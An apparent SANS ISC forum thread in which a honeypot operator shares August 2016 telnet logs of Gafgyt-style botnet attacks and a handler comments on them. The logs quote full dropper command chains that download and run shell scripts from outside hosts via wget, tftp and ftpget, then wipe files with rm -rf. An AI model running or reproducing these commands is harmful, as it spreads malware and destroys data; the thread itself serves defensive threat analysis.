|
Starting last night (Aug 23) I've seen a brand new style of attacks against my telnet honeypots. It appears that they are sending commands as the username and/or the password. I assume there's some new vulnerability where somebody's telnetd will actually run these commands. Anybody have a clue? Sample logs follow: 2016-08-23T22:22:43.301154-04:00 erhp2 ptelnetd[539]: IP: ###.#.137.70 TelnetLog: Username: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://##.###.2.94/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp ##.##.2.94 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g ##.###.2.94; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 ##.###.2.94 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * Password: � 2016-08-24T02:32:58.166913-04:00 erhp2 ptelnetd[3966]: IP: ##.##.121.102 TelnetLog: Username: sh Password: cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://##.##.172.238/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g ##.##.172.238;sh bin2.sh;busybox tftp ##.##.172.238 -c get bin3.sh;sh bin3.sh;busybox ftpget ##.##.172.238 bin4.sh bin4.sh;sh bin4.sh;exit >>Ericw |
EricWedaa 4 Posts |
| thread locked Quote Subscribe |
Aug 24th 2016 5 years ago |
|
Hello Eric, Could be a buggy bot script? The set of commands sent as username is coming from the classic Gafgyt malware… Could you share the IP addresses with me please? KR, |
Xme 667 Posts ISC Handler |
| Thread locked. Quote |
Aug 24th 2016 5 years ago |
| I don't think so. That malware apparently tries a dictionary attack and if it suceeds THEN it sends commands. At least according to what little I could find. Do you have decent writeup someplace? |
EricWedaa 4 Posts |
| Thread locked. Quote |
Aug 24th 2016 5 years ago |
Sign Up for Free or Log In to start participating in the conversation!
https://www.sans.edu
